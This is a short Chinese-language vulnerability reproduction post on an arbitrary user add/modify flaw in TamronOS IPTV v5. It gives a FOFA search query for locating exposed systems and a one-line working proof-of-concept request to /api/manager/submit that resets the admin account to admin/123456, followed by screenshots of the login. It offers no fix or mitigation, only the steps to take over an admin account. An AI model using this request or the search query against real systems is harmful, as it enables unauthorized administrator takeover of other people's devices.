TamronOS_IPTV系统存在任意用户添加修改-棉花糖会员站

# TamronOS IPTV系统存在任意用户添加修改

## 漏洞描述

TamronOS IPTV系统存在任意用户添加修改,攻击者可以利用此漏洞新增管理员，或者利用此漏洞重置管理员账户密码。

## 漏洞影响

> TamronOS IPTV v5 3..6.6

## FOFA

> title=”TamronOS IPTV系统”

## 复现

1）登录界面

![1](/static/qingy/TamronOS_IPTV系统存在任意用户添加修改/img/1.jpg)

2）POC如下,直接修改用户名密码为admin/123456

“`
/api/manager/submit?group=1&password=123456&rnd=0.27576036347932775&status=1&username=admin
“`

![2](/static/qingy/TamronOS_IPTV系统存在任意用户添加修改/img/2.jpg)

3）登录

![3](/static/qingy/TamronOS_IPTV系统存在任意用户添加修改/img/3.jpg)

文章版权归作者所有，未经允许请勿转载。

THE END

TamronOS_IPTV系统存在任意用户添加修改